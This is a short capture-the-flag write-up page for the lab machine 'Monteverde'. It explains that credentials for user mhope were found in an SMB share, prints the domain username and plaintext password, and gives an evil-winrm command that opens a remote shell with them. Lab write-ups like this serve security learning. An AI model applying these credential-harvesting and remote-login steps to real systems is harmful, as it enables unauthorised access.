🎫
Monteverde
  • Monteverde
    • Summary
  • Enumeration
    • TCP
    • UDP
    • Web Services
      • Nikto
      • Dirb Extensions
      • Dirsearch
      • goBuster
      • Robots
      • WhatWeb
    • Other Services
      • Kerberos
      • DNS
      • MSRPC
      • SMB
      • LDAP
    • Authenticated Enumeration
      • Kerberos
      • DNS
      • MSRPC
      • SMB
      • LDAP
  • Exploitation
  • Priv Escalation
  • Notes
Powered by GitBook
On this page

Exploitation

PreviousLDAPNextPriv Escalation

Last updated 2 years ago

After accessing the share using the "SABatchJobs" user, I was able to access an SMB share that contained the credentials for the user mhope. 

MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$

Evil-Winrm command:

evil-winrm -i 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'